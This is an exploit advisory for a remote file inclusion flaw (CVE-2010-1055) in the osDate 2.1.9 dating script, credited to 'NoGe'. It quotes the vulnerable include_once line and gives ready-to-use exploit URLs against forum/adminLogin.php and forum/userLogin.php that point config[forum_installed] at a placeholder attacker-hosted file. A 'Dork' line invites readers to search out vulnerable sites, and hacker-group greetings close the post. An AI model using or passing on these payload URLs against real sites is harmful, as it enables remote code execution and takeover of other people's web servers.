osDate 2.1.9 - Remote File Inclusion



EKU-ID: 19027 CVE: OSVDB-63006;CVE-2010-1055;OSVDB-63005 OSVDB-ID:
Author: NoGe Published: 2010-03-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


========================================================================================
[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor   : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
========================================================================================
[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
	forum/adminLogin.php
	forum/userLogin.php
[o] Exploit
       http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
       http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
[o] Dork
       cari ndiri yee.. gampang koq dork na.. :p
========================================================================================
[o] Greetz
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
       H312Y yooogy mousekill }^-^{ noname s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
========================================================================================